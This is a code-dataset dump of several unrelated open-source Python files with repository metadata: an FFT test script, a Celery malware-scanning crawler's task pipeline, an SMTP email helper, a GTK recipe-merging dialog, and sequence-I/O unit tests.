print 'SNR (compared to NumPy) : %.1fdB' % float(snr)
if snr<minsnr:
print 'xver=',xver
print 'x2=',x2
print 'err',err
sys.exit(1)
def dofft(x,isreal):
dims=list( numpy.shape(x) )
x = flatten(x)
scale=1
if datatype=='int16_t':
x = 32767 * x
scale = len(x) / 32767.0
elif datatype=='int32_t':
x = 2147483647.0 * x
scale = len(x) / 2147483647.0
cmd='%s -n ' % util
cmd += ','.join([str(d) for d in dims])
if doreal:
cmd += ' -R '
print cmd
p = popen2.Popen3(cmd )
open('/tmp/fftin.dat','w').write(dopack( x , isreal==False ) )
p.tochild.write( dopack( x , isreal==False ) )
p.tochild.close()
res = dounpack( p.fromchild.read() , 1 )
open('/tmp/fftout.dat','w').write(dopack( flatten(res) , True ) )
if doreal:
dims[-1] = int( dims[-1]/2 ) + 1
res = scale * res
p.wait()
return numpy.reshape(res,dims)
def main():
opts,args = getopt.getopt(sys.argv[1:],'r')
opts=dict(opts)
global doreal
doreal = opts.has_key('-r')
if doreal:
print 'Testing multi-dimensional real FFTs'
else:
print 'Testing multi-dimensional FFTs'
for dim in range(1,4):
test_fft( dim )
if __name__ == "__main__":
main()
|
mit
| -8,352,119,809,851,959,000
| 21.006173
| 72
| 0.555961
| false
| 2.861156
| true
| false
| false
|
chrissorchard/malucrawl
|
malware_crawl/tasks.py
|
1
|
2599
|
from celery import task, chord
from .scan import scanners, heavy_scanners
from .search import search_engines
from .source import sources
from datetime import datetime
from dateutil.tz import tzutc
from .models import TopicSet
# validator = jsonschema.Draft3Validator(json.loads(pkgutil.get_data("malware_crawl", "malware_discovery_schema.json")))
def complete_crawl():
for source in sources:
source.apply_async(
link=begin_search.subtask(args=(source,))
)
# todo: repeat old searches
@task
def begin_search(keywords, source):
discovered = datetime.now(tzutc())
ts = TopicSet.objects.create(
discovered=discovered,
source=source
)
for keyword in keywords:
topic = ts.topic_set.create(
keyword=keyword
)
for engine in search_engines:
engine.apply_async(
args=(keyword,), link=begin_scan.subtask(args=(engine, topic))
)
@task
def begin_scan(urls, engine, topic):
discovered = datetime.now(tzutc())
search = topic.search_set.create(
discovered=discovered,
source=engine
)
for url in urls:
result = search.result_set.create(
url=url
)
for scanner in scanners:
report = result.malwarereport_set.create(
reporter=scanner
)
scanner.apply_async(
args=(url,),
link=begin_store.subtask(
args=(report,)
)
)
"""
# Check to see if we should scan heavily
def check_opinions(all_opinions, reporters):
print all_opinions
return False
@task
def accept_scan(all_opinions, reporters, url, result):
if check_opinions(all_opinions, reporters):
for scanner in heavy_scanners:
report = result.malwarereport_set.create(
reporter=scanner
)
scanner.apply_async(
args=(url,),
link=begin_store.subtask(
args=(report,)
)
)
for opinions, reporter in zip(all_opinions, reporters):
begin_store.apply_async(
args=(opinions, report)
)
"""
@task
def begin_store(opinions, report):
for opinion in opinions:
report.opinion_set.create(
type=opinion["type"],
confidence=opinion["confidence"]
)
@task
def tprint(content):
print content
|
mit
| -8,517,734,512,202,998,000
| 22.518868
| 120
| 0.560215
| false
| 4.086478
| false
| false
| false
|
atvKumar/TheWatcher
|
mkEmail.py
|
1
|
5302
|
from smtplib import SMTP, SMTP_SSL
from smtplib import SMTPException
from mimetypes import guess_type
from os.path import basename
from email.utils import COMMASPACE
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.encoders import encode_base64
class EmailConnectionError(Exception):
pass
class SendEmailError(Exception):
pass
def get_email(email):
if '<' in email:
data = email.split('<')
email = data[1].split('>')[0].strip()
return email.strip()
class Email(object):
def __init__(self, from_, to, subject, message, message_type='plain',
attachments=None, cc=None, bcc=None,
message_encoding='us-ascii', multi_to=False, multi_cc=False,
multi_bcc=False, multi_attach=False):
self.email = MIMEMultipart()
self.message = message
self.email['From'] = from_
if not multi_to:
self.email['To'] = to
else:
self.email['To'] = COMMASPACE.join(to)
self.email['Subject'] = subject
self.email['subject'] = subject # Case Sensitive Email-Readers
if cc is not None:
if not multi_cc:
self.email['Cc'] = cc
else:
self.email['Cc'] = COMMASPACE.join(cc)
if bcc is not None:
if not multi_bcc:
self.email['bcc'] = bcc
else:
self.email['bcc'] = COMMASPACE.join(bcc)
text = MIMEText(message, message_type, message_encoding)
self.email.attach(text)
if attachments is not None:
if multi_attach:
for filename in attachments:
self.attach(filename)
else:
self.attach(attachments)
def debug(self, mime=False):
print 'From : ', self.email['From']
print 'To : ', self.email['To']
print 'Cc : ', self.email['Cc']
print 'Bcc : ', self.email['bcc']
print 'Subject : ', self.email['Subject']
print 'Message :', self.message
if mime:
print self.email.as_string()
def attach(self, filename):
mimetype, encoding = guess_type(filename)
if mimetype is None:
mimetype = 'application/octet-stream'
mimetype = mimetype.split('/', 1)
fp = open(filename, 'rb')
attachment = MIMEBase(mimetype[0], mimetype[1])
attachment.set_payload(fp.read())
fp.close()
encode_base64(attachment)
attachment.add_header('Content-Disposition', 'attachment',
filename=basename(filename))
self.email.attach(attachment)
def __str__(self):
return self.email.as_string()
class EmailConnection(object):
def __init__(self, server, username, password, debug=False):
if ':' in server:
data = server.split(':')
self.server = data[0]
self.port = int(data[1])
else:
self.server = server
self.port = 25
self.username = username
self.password = password
self.connect(debug)
def __enter__(self):
return self
def __exit__(self, exception_type, exception_val, trace):
self.close()
def connect(self, debug):
self.connection = SMTP(host=self.server, port=self.port)
if debug: # Debug Information
# self.debuglevel = 1
self.connection.set_debuglevel(debug)
# identify ourselves, prompting server for supported features
self.connection.ehlo()
# If we can encrypt this session, do it
if self.connection.has_extn('STARTTLS'):
self.connection.starttls()
self.connection.ehlo()
self.connection.esmtp_features['auth'] = 'PLAIN LOGIN'
self.connection.login(self.username, self.password)
def send(self, message, from_=None, to=None, verify=False):
if type(message) == str:
if from_ is None or to is None:
raise EmailConnectionError('You need to specify `from_` '
'and `to`')
else:
from_ = get_email(from_)
to = get_email(to)
else:
from_ = message.email['From']
if 'Cc' not in message.email:
message.email['Cc'] = ''
if 'bcc' not in message.email:
message.email['bcc'] = ''
to_emails = list(message.email['To'].split(',')) + \
message.email['Cc'].split(',') + \
message.email['bcc'].split(',')
to = [get_email(complete_email) for complete_email in to_emails]
message = str(message)
if verify:
for each_email in to_emails:
self.connection.verify(each_email)
# TODO option - remove emails that failed verification
# return self.connection.sendmail(from_, to, message)
try:
self.connection.sendmail(from_, to, message)
except SMTPException:
raise SendEmailError('Message Could not be sent!')
def close(self):
self.connection.close()
|
apache-2.0
| -3,787,192,903,398,085,000
| 35.068027
| 77
| 0.557714
| false
| 4.184688
| false
| false
| false
|
thinkle/gourmet
|
gourmet/plugins/duplicate_finder/recipeMerger.py
|
1
|
25533
|
"""recipeMerger.py
This module contains code for handling the 'merging' of duplicate
recipes.
"""
import os.path
import time
from typing import Union
from gettext import gettext as _
from gi.repository import Gtk, Pango
from gourmet import convert, gglobals, recipeIdentifier, recipeManager
from gourmet.gtk_extras import ratingWidget, mnemonic_manager, dialog_extras
NEWER = 1
OLDER = 2
try:
current_path = os.path.split(os.path.join(os.getcwd(),__file__))[0]
except:
current_path = ''
def time_to_text (val):
curtime = time.time()
if val == 0:
return 'Unknown'
# within 18 hours, return in form 4 hours 23 minutes ago or some such
if curtime - val < 18 * 60 * 60:
return _("%s ago")%convert.seconds_to_timestring(curtime-val,round_at=1)
tupl=time.localtime(val)
if curtime - val < 7 * 24 * 60 * 60:
return time.strftime('%A %T',tupl)
else:
return time.strftime('%D %T',tupl)
class ConflictError (ValueError):
def __init__ (self, conflicts):
self.conflicts = conflicts
class RecipeMergerDialog:
"""A dialog to allow the user to merge recipes.
"""
# These line up to the position of the options in the search-type
# combo box in glade...
RECIPE_DUP_MODE = 0
ING_DUP_MODE = 1
COMPLETE_DUP_MODE = 2
DUP_INDEX_PAGE = 0
MERGE_PAGE = 1
def __init__ (self, rd=None, in_recipes=None, on_close_callback=None):
if rd:
self.rd = rd
else:
self.rd = recipeManager.get_recipe_manager()
self.in_recipes = in_recipes
self.on_close_callback = on_close_callback
self.to_merge = [] # Queue of recipes to be merged...
self.ui = Gtk.Builder()
self.ui.add_from_file(os.path.join(current_path,'recipeMerger.ui'))
self.get_widgets()
self.searchTypeCombo.set_active(self.COMPLETE_DUP_MODE)
self.mm = mnemonic_manager.MnemonicManager()
self.mm.add_builder(self.ui)
self.mm.fix_conflicts_peacefully()
self.ui.connect_signals(
{
'on_searchTypeCombo_changed':lambda *args: self.populate_tree(),
'on_includeDeletedRecipesCheckButton_toggled':lambda *args: self.populate_tree(),
'on_mergeAllButton_clicked':self.merge_all,
'on_cancelMergeButton_clicked':self.cancel_merge,
'on_mergeSelectedButton_clicked':self.merge_selected,
'on_applyButton_clicked':self.apply_merge,
'auto_merge':self.offer_auto_merge,
'close':self.close,
}
)
def get_widgets (self):
for w in [
'recipeDiffScrolledWindow',
'duplicateRecipeTreeView',
'mergeAllButton','mergeSelectedButton', # buttons on list-dups page (minus close button)
'applyMergeButton','closeMergeButton','cancelMergeButton', # buttons on merge-recs page
'searchTypeCombo','includeDeletedRecipesCheckButton','notebook',
'mergeInfoLabel'
]:
setattr(self,w,self.ui.get_object(w))
self.setup_treeview()
def setup_treeview (self):
renderer = Gtk.CellRendererText()
col = Gtk.TreeViewColumn('Recipe',renderer,text=2)
self.duplicateRecipeTreeView.append_column(col)
self.duplicateRecipeTreeView.insert_column_with_data_func(
-1, # position
'Last Modified', # title
renderer, # renderer
self.time_cell_data_func, # function
3 # data column
)
col = Gtk.TreeViewColumn('Duplicates',renderer,text=4)
self.duplicateRecipeTreeView.append_column(col)
self.duplicateRecipeTreeView.get_selection().set_mode(Gtk.SelectionMode.MULTIPLE)
def time_cell_data_func (self, tree_column, cell, model, titer, data_col):
"""Display time in treeview cell.
"""
val = model.get_value(titer,data_col)
cell.set_property('text',time_to_text(val))
def populate_tree (self):
"""Populate treeview with duplicate recipes.
"""
#print 'CALL: populate_tree'
search_mode =self.searchTypeCombo.get_active()
include_deleted = self.includeDeletedRecipesCheckButton.get_active()
if search_mode == self.RECIPE_DUP_MODE:
dups = self.rd.find_duplicates(by='recipe',
recipes=self.in_recipes,
include_deleted=include_deleted)
elif search_mode == self.ING_DUP_MODE:
dups = self.rd.find_duplicates(by='ingredient',
recipes=self.in_recipes,
include_deleted=include_deleted)
else: # == self.COMPLETE_DUP_MODE
dups = self.rd.find_complete_duplicates(include_deleted=include_deleted,
recipes=self.in_recipes)
self.setup_treemodel(dups)
self.dups = dups
self.duplicateRecipeTreeView.set_model(self.treeModel)
def setup_treemodel (self, dups):
self.treeModel = Gtk.TreeStore(int,int,str,int,str) # dup_index, rec_id, rec_title, last_modified, number_of_duplicates
for dup_index,duplicate_recipes in enumerate(dups):
first = duplicate_recipes[0]
others = duplicate_recipes[1:]
nduplicates = len(duplicate_recipes)
r = self.rd.get_rec(first)
firstIter = self.treeModel.append(
None,
(dup_index or 0, first or 0, r.title or '', r.last_modified or 0, str(nduplicates))
)
for o in others:
r = self.rd.get_rec(o)
self.treeModel.append(firstIter,
(dup_index,o,r.title,r.last_modified or 0,'')
)
def merge_next_recipe (self, ):
if self.to_merge:
self.current_dup_index = self.to_merge.pop(0)
self.mergeInfoLabel.set_text(
'Merging recipe %(index)s of %(total)s'%{
'index':self.total_to_merge - len(self.to_merge),
'total':self.total_to_merge
})
duplicate_recipes = self.dups[self.current_dup_index]
#self.idt = IngDiffTable(self.rd,duplicate_recipes[0],duplicate_recipes[1])
self.current_recs = [self.rd.get_rec(i) for i in duplicate_recipes]
last_modified = {'last_modified':[r.last_modified for r in self.current_recs]}
self.current_diff_data = recipeIdentifier.diff_recipes(self.rd,self.current_recs)
last_modified.update(self.current_diff_data)
self.diff_table = DiffTable(last_modified,self.current_recs[0],parent=self.recipeDiffScrolledWindow)
self.diff_table.add_ingblocks(self.rd, self.current_recs)
if not self.diff_table.idiffs and not self.current_diff_data:
# If there are no differences, just merge the recipes...
self.apply_merge()
return
if self.recipeDiffScrolledWindow.get_child():
self.recipeDiffScrolledWindow.remove(self.recipeDiffScrolledWindow.get_child())
self.diff_table.show()
#self.idt.show()
vb = Gtk.VBox()
vb.add(self.diff_table)
#vb.add(self.idt)
vb.show()
#self.recipeDiffScrolledWindow.add_with_viewport(self.diff_table)
self.recipeDiffScrolledWindow.add_with_viewport(vb)
self.notebook.set_current_page(self.MERGE_PAGE)
else:
self.notebook.set_current_page(self.DUP_INDEX_PAGE)
def do_merge (self, merge_dic, recs, to_keep=None):
if not to_keep:
to_keep = recs[0]
if isinstance(to_keep, int):
to_keep = self.rd.get_rec(to_keep)
self.rd.modify_rec(to_keep,merge_dic)
for r in recs:
if r.id != to_keep.id:
self.rd.delete_rec(r)
def apply_merge (self, *args):
#print "CALL: apply_merge"
#print 'Apply ',self.diff_table.selected_dic,'on ',self.diff_table.rec
self.do_merge(self.diff_table.selected_dic,
self.current_recs,
to_keep=self.diff_table.rec)
self.merge_next_recipe()
if not self.to_merge:
self.populate_tree()
def merge_selected (self, *args):
"""Merge currently selected row from treeview.
"""
#print "CALL: merge_selected"
mod,rows = self.duplicateRecipeTreeView.get_selection().get_selected_rows()
dup_indices = [mod[r][0] for r in rows]
self.to_merge = []
for d in dup_indices:
if d not in self.to_merge:
self.to_merge.append(d)
self.total_to_merge = len(self.to_merge)
self.merge_next_recipe()
def merge_all (self, *args):
"""Merge all rows currently in treeview.
"""
self.total_to_merge = len(self.dups)
self.to_merge = list(range(self.total_to_merge))
self.merge_next_recipe()
def offer_auto_merge (self, *args):
try:
            option = dialog_extras.getOption(
label=_('Auto-Merge recipes'),
options=[
(_('Always use newest recipe'),NEWER),
(_('Always use oldest recipe'),OLDER),
# The following would be nice to add eventually...
#_('Always use longer field'),
#_('Ignore differences in ingredient keys')
]
)
if not option:
return
            self.do_auto_merge(option)
except dialog_extras.UserCancelledError:
pass
def do_auto_merge (self, mode):
if self.recipeDiffScrolledWindow.get_child():
self.recipeDiffScrolledWindow.remove(self.recipeDiffScrolledWindow.get_child())
vb = Gtk.VBox()
l = Gtk.Label()
l.set_markup('<u>Automatically merged recipes</u>')
vb.pack_start(l,expand=False,fill=False); vb.show_all()
self.recipeDiffScrolledWindow.add_with_viewport(vb)
def do_auto_merge ():
kept = self.auto_merge_current_rec(mode)
label = Gtk.Label(label='%s'%kept.title)
vb.pack_start(label,expand=False,fill=False); label.show()
self.cancelMergeButton.hide()
self.applyMergeButton.hide()
self.closeMergeButton.set_sensitive(False)
do_auto_merge()
while self.to_merge:
self.mergeInfoLabel.set_text(
'Automatically merging recipe %(index)s of %(total)s'%{
'index':self.total_to_merge - len(self.to_merge),
'total':self.total_to_merge
})
self.current_dup_index = self.to_merge.pop(0)
duplicate_recipes = self.dups[self.current_dup_index]
self.current_recs = [self.rd.get_rec(i) for i in duplicate_recipes]
do_auto_merge()
while Gtk.events_pending(): Gtk.main_iteration()
self.mergeInfoLabel.set_text('Automatically merged %s recipes'%self.total_to_merge)
self.closeMergeButton.set_sensitive(True)
def auto_merge_current_rec (self, mode):
        assert(mode in [NEWER, OLDER]) # TODO: make this an enum and type-annotate it
self.current_recs.sort(key=lambda x: x.last_modified, reverse=(mode==OLDER))
keeper = self.current_recs[0]
tossers = self.current_recs[1:]
for to_toss in tossers:
self.rd.delete_rec(to_toss)
return keeper
def cancel_merge (self, *args):
self.merge_next_recipe()
if not self.to_merge:
self.populate_tree()
def populate_tree_if_possible (self):
self.populate_tree()
if not self.dups:
self.searchTypeCombo.set_active(self.RECIPE_DUP_MODE)
self.populate_tree()
if not self.dups:
self.searchTypeCombo.set_active(self.ING_DUP_MODE)
self.populate_tree()
def show_if_there_are_dups (self, label=None):
self.populate_tree_if_possible()
if self.dups:
self.show(label=label)
else:
self.ui.get_object('window1').destroy()
def show (self, label=None):
if label:
messagebox = self.ui.get_object('messagebox')
l = Gtk.Label(label=label)
l.set_line_wrap(True)
infobar = Gtk.InfoBar()
infobar.set_message_type(Gtk.MessageType.INFO)
infobar.get_content_area().add(l)
infobar.show_all()
messagebox.pack_start(infobar, True, False)
self.ui.get_object('window1').show()
def close (self, *args):
#print "CALL: close"
w = self.ui.get_object('window1')
w.hide()
w.destroy()
if self.on_close_callback:
self.on_close_callback(self)
class RecipeMerger:
"""A class to handle recipe merging.
"""
def __init__ (self, rd):
self.rd = rd
def autoMergeRecipes (self, recs):
to_fill,conflicts = recipeIdentifier.merge_recipes(self.rd, recs)
if conflicts:
raise ConflictError(conflicts)
else:
to_keep = recs[0]
# Update a single recipe with our information...
self.rd.modify_rec(to_keep,to_fill)
# Delete the other recipes...
for r in recs[1:]:
self.rd.delete_rec(r.id)
def uiMergeRecipes (self, recs):
diffs = recipeIdentifier.diff_recipes(self.rd, recs)
        idiffs = recipeIdentifier.diff_ings(self.rd, recs[0], recs[1])
if diffs:
return DiffTable(diffs,recs[0])
else:
return None
class DiffTable (Gtk.Table):
"""A Table displaying differences in a recipe.
diff_dic is a dictionary with the differences.
{'attribute':(VAL1,VAL2,...)}
recipe_object is a recipe object representing one of our duplicate
recs, from which we can grab attributes that are not different.
dont_choose is a list of attributes whose differences are
displayed, but where no choice is offered (such as modification
time for the recipe).
"""
def __init__ (self, diff_dic, recipe_object=None, parent=None,
dont_choose=[]):
self.idiffs = []
self.diff_dic = diff_dic
Gtk.Table.__init__(self)
self.selected_dic = {}
self.set_col_spacings(6)
self.set_row_spacings(6)
self.row = 0
self.max_cols = 1
for attr,name,typ in [('last_modified','Last Modified',None)] + gglobals.REC_ATTRS \
+ [('image','Image',None)] \
+ [(attr,gglobals.TEXT_ATTR_DIC[attr],None) for attr in gglobals.DEFAULT_TEXT_ATTR_ORDER]:
if attr in diff_dic:
buttons = self.build_options(attr,self.diff_dic[attr])
label = Gtk.Label(label='_'+name+':')
label.set_alignment(0.0,0.5)
label.set_use_underline(True)
label.show()
self.attach(label,0,1,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
target = None
for col,b in enumerate(buttons):
self.setup_widget_size(b,in_col=True)
b.show()
if not target:
target = b
label.set_mnemonic_widget(target)
self.attach(b,col+1,col+2,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
if col > self.max_cols: self.max_cols = col
self.row += 1
elif recipe_object and hasattr(recipe_object,attr) and getattr(recipe_object,attr):
att_label = Gtk.Label(label=name+':')
att_label.set_use_underline(True)
att_label.set_alignment(0,0.5)
att_label.show()
constructor = get_display_constructor(attr)
val = getattr(recipe_object,attr)
val_label = constructor(getattr(recipe_object,attr))
val_label.show()
self.setup_widget_size(val_label,False)
if hasattr(val_label,'set_alignment'): val_label.set_alignment(0,0.5)
self.attach(att_label,0,1,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
self.attach(val_label,1,5,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
self.row += 1
self.mm = mnemonic_manager.MnemonicManager()
self.mm.add_toplevel_widget(self)
self.mm.fix_conflicts_peacefully()
self.rec = recipe_object.id
def setup_widget_size (self, w, in_col=True):
if in_col:
w.set_size_request(230,-1)
else:
w.set_size_request(650,-1)
def build_options (self, attribute, values):
buttons = []
group_rb = None
make_widget = get_display_constructor(attribute)
for v in values:
rb = Gtk.RadioButton(group=group_rb)
if not group_rb: group_rb = rb
if v is not None:
rb.add(make_widget(v))
else:
rb.add(Gtk.Label(label=_("None")))
rb.show_all()
buttons.append(rb)
rb.connect('toggled',self.value_toggled,attribute,v)
self.selected_dic[attribute] = values[0]
for n,v in enumerate(values):
if v:
buttons[n].set_active(True)
break
return buttons
def value_toggled (self, rb, attribute, v):
self.selected_dic[attribute] = v
def add_ingblocks (self, rd, recs):
#print 'add_ingblocks for ',[r.id for r in recs]
self.rd = rd
self.iblock_dic = {}
if len(recs) == 1:
blocks = recipeIdentifier.format_ingdiff_line(recipeIdentifier.format_ings(recs[0],self.rd))
self.iblock_dic[blocks[0]] = recs[0]
else:
blocks = []
rec_0 = recs[0]
for r in recs[1:]:
chunks = self.get_ing_text_blobs(rec_0,r)
if not chunks and not blocks:
# If there is no diff, in other words, and we
# don't yet have any block...
chunks = [recipeIdentifier.format_ings(recs[0],self.rd)]
elif not chunks:
# Otherwise if there are no diffs we just continue
# our loop...
continue
if not blocks:
blocks = [chunks[0]]
self.iblock_dic[blocks[0]] = rec_0
if chunks and len(chunks) > 1:
new_block = chunks[1]
if new_block not in blocks:
blocks.append(new_block)
self.iblock_dic[new_block] = r
group_rb = None
name = _('Ingredients')
if len(blocks) > 1:
lab = Gtk.Label(label='_'+_("Ingredients")); lab.set_use_underline(True)
for col,block in enumerate(blocks):
rb = Gtk.RadioButton(
label=_("Recipe")+ ' ' +'%i'%(col+1),
group=group_rb
)
if not group_rb:
group_rb = rb
lab.set_mnemonic_widget(rb)
if not block:
rb.add(Gtk.Label(label=_("None")))
else:
for n,txt in enumerate(block):
l = Gtk.Label(label=txt)
l.set_alignment(0.0,0.0)
l.set_use_markup(True)
l.set_line_wrap(True); l.set_line_wrap_mode(Pango.WrapMode.WORD)
l.show()
self.setup_widget_size(l,in_col=True)
self.attach(l,col+1,col+2,self.row+1+n,self.row+2+n,
xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,
yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
#rb.add(l)
rb.connect('toggled',self.ing_value_toggled,block)
self.setup_widget_size(rb,in_col=True)
rb.show()
self.attach(rb,col+1,col+2,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
else:
lab = Gtk.Label(label=_("Ingredients")); lab.show()
l = Gtk.Label(label=blocks[0])
l.set_alignment(0.0,0.0)
l.set_use_markup(True)
l.set_line_wrap(True); l.set_line_wrap_mode(Pango.WrapMode.WORD)
l.show()
self.attach(l,1,5,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
lab.set_alignment(0.0,0.0); lab.show()
self.attach(lab,0,1,self.row,self.row+1,xoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL,yoptions=Gtk.AttachOptions.SHRINK|Gtk.AttachOptions.FILL)
def ing_value_toggled (self, rb, block):
if rb.get_active():
#print 'RB clicked',rb,'for block',block
#print 'ING TOGGLED - REC = ',
self.rec = self.iblock_dic[block]
#print self.rec
def get_ing_text_blobs (self, r1, r2):
"""Return an ing-blurb for r1 and r2 suitable for display."""
idiff = recipeIdentifier.diff_ings(self.rd, r1, r2)
if idiff: self.idiffs.append(idiff)
def is_line (l):
return not (l == '<diff/>')
if idiff:
ret = []
for igroup in idiff:
ret.append((recipeIdentifier.format_ingdiff_line(i)
for i in filter(is_line,igroup)))
return ret
def put_text_in_scrolled_window(text: str) -> Gtk.ScrolledWindow:
sw = Gtk.ScrolledWindow()
tv = Gtk.TextView()
sw.add(tv)
tv.get_buffer().set_text(text)
tv.set_editable(False)
tv.set_wrap_mode(Gtk.WrapMode.WORD)
sw.set_policy(Gtk.PolicyType.NEVER,Gtk.PolicyType.AUTOMATIC)
tv.show()
return sw
def make_text_label(text: str, use_markup: bool = False) -> Union[Gtk.Label, Gtk.ScrolledWindow]:
if not text:
return Gtk.Label(label=_('None'))
elif len(text) < 30:
return Gtk.Label(label=text)
elif len(text) < 250:
label = Gtk.Label(label=text)
if use_markup:
label.set_use_markup(use_markup)
label.set_line_wrap_mode(Pango.WrapMode.WORD)
return label
else:
return put_text_in_scrolled_window(text)
def get_display_constructor (attribute):
if attribute == 'rating':
return lambda v: ratingWidget.StarImage(
ratingWidget.star_generator,
value=v,
upper=10)
elif attribute in ['preptime','cooktime']:
return lambda v: Gtk.Label(label=convert.seconds_to_timestring(v))
elif attribute=='image':
return lambda v: (v and Gtk.Label(label="An Image") or Gtk.Label(label="No Image"))
elif attribute in gglobals.DEFAULT_TEXT_ATTR_ORDER:
return make_text_label
elif attribute == 'last_modified':
return lambda v: Gtk.Label(label=time_to_text(v))
else:
return lambda v: v and Gtk.Label(label=v) or Gtk.Label(label=_('None'))
if __name__ == '__main__':
def test_in_window (widget):
"""Put widget in window and show it"""
w = Gtk.Window()
w.add(widget)
w.connect('delete-event',Gtk.main_quit)
w.show()
Gtk.main()
def test_difftable ():
class FakeRec:
pass
test_rec = FakeRec()
test_rec.title = 'Shloppidy Recipe'
test_data = {'rating':[4,7],
'category':['Dessert','Dessert, Cake'],
'cuisine':['American','All-American'],
'preptime':[6000,12000],
'cooktime':[6543,None]}
t = DiffTable(test_data,test_rec)
t.show()
test_in_window(t)
print(t.selected_dic)
def test_merger (rd, conflicts):
recs = [rd.get_rec(i) for i in conflicts]
rmerger = RecipeMerger(rd)
to_fill,conflict_dic = recipeIdentifier.merge_recipes(rd,recs)
if conflict_dic:
dt = rmerger.uiMergeRecipes(recs)
dt.show()
test_in_window(dt)
print(dt.selected_dic)
elif to_fill:
print('Differences in ',conflicts,'can be auto-filled with',to_fill)
else:
print('No differences in ',conflicts)
rd = recipeManager.default_rec_manager()
rmd = RecipeMergerDialog(rd)
rmd.populate_tree()
rmd.show()
rmd.ui.get_object('window1').connect('delete-event',Gtk.main_quit)
Gtk.main()
#dups = rd.find_complete_duplicates()
#for d in dups[5:]:
# test_merger(rd,d)
|
gpl-2.0
| 6,182,747,767,306,343,000
| 39.464342
| 180
| 0.567932
| false
| 3.686011
| true
| false
| false
|
JoseBlanca/seq_crumbs
|
test/seq/test_seqio.py
|
1
|
10372
|
# Copyright 2012 Jose Blanca, Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of seq_crumbs.
# seq_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# seq_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with seq_crumbs. If not, see <http://www.gnu.org/licenses/>.
# pylint: disable=R0201
# pylint: disable=R0904
# pylint: disable=C0111
import os
import unittest
from cStringIO import StringIO
from tempfile import NamedTemporaryFile
from subprocess import Popen, PIPE
from Bio.SeqRecord import SeqRecord
from Bio.Seq import Seq
from crumbs.utils.test_utils import TEST_DATA_DIR
from crumbs.utils.bin_utils import BIN_DIR
from crumbs.seq.seqio import (guess_seq_type, fastaqual_to_fasta, seqio,
_write_seqrecords, _read_seqrecords,
_itemize_fastx, read_seqs, write_seqs)
from crumbs.utils.tags import SEQITEM, SEQRECORD
from crumbs.exceptions import IncompatibleFormatError, MalformedFile
FASTA = ">seq1\natctagtc\n>seq2\natctagtc\n>seq3\natctagtc\n"
QUAL = ">seq1\n30 30 30 30 30 30 30 30\n>seq2\n30 30 30 30 30 30 30 30\n"
QUAL += ">seq3\n30 30 30 30 30 30 30 30\n"
FASTQ = '@seq1\natcgt\n+\n?????\n@seq2\natcgt\n+\n?????\n@seq3\natcgt\n+\n'
FASTQ += '?????\n'
class SeqIOTest(unittest.TestCase):
'It tests the seqio functions'
@staticmethod
def _make_fhand(content=None):
'It makes temporary fhands'
if content is None:
content = ''
fhand = NamedTemporaryFile()
fhand.write(content)
fhand.flush()
return fhand
def test_guess_seq_type(self):
'It guesses if the sequence is nucleotide or protein'
fpath = os.path.join(TEST_DATA_DIR, 'arabidopsis_genes')
assert guess_seq_type(open(fpath)) == 'nucl'
fpath = os.path.join(TEST_DATA_DIR, 'pairend2.sfastq')
assert guess_seq_type(open(fpath)) == 'nucl'
@staticmethod
def test_fastaqual_to_fasta():
seq_fhand = StringIO('>seq1\nattct\n>seq2\natc\n')
qual_fhand = StringIO('>seq1\n2 2 2 2 2\n>seq2\n2 2 2\n')
out_fhand = NamedTemporaryFile()
fastaqual_to_fasta(seq_fhand, qual_fhand, out_fhand)
fastq = open(out_fhand.name).read()
assert fastq == "@seq1\nattct\n+\n#####\n@seq2\natc\n+\n###\n"
def test_seqio(self):
        'It tests the seqio function'
# fastq to fasta
out_fhand = NamedTemporaryFile()
seqio([self._make_fhand(FASTQ)], out_fhand, 'fasta')
assert ">seq1\natcgt" in open(out_fhand.name).read()
# fastq to fastq-illumina
out_fhand = NamedTemporaryFile()
seqio([self._make_fhand(FASTQ)], out_fhand, 'fastq-illumina')
assert "@seq1\natcgt\n+\n^^^^" in open(out_fhand.name).read()
out_fhand = NamedTemporaryFile()
seqio([self._make_fhand(FASTQ), self._make_fhand(FASTQ)],
out_fhand, 'fastq-illumina')
assert "@seq3\natcgt\n+\n^^^^^\n@seq1" in open(out_fhand.name).read()
# fasta to fastq
out_fhand = NamedTemporaryFile()
try:
seqio([self._make_fhand(FASTA)], out_fhand, 'fastq')
self.fail("error previously expected")
except IncompatibleFormatError as error:
assert 'No qualities available' in str(error)
# bad_format fastq
bad_fastq_fhand = self._make_fhand(FASTQ + 'aklsjhdas')
try:
seqio([bad_fastq_fhand], out_fhand, 'fasta')
self.fail("error previously expected")
except MalformedFile as error:
assert 'Lengths of sequence and quality' in str(error)
# genbank to fasta
out_fhand = NamedTemporaryFile()
genbank_fhand = open(os.path.join(TEST_DATA_DIR, 'sequence.gb'))
seqio([genbank_fhand], out_fhand, 'fasta')
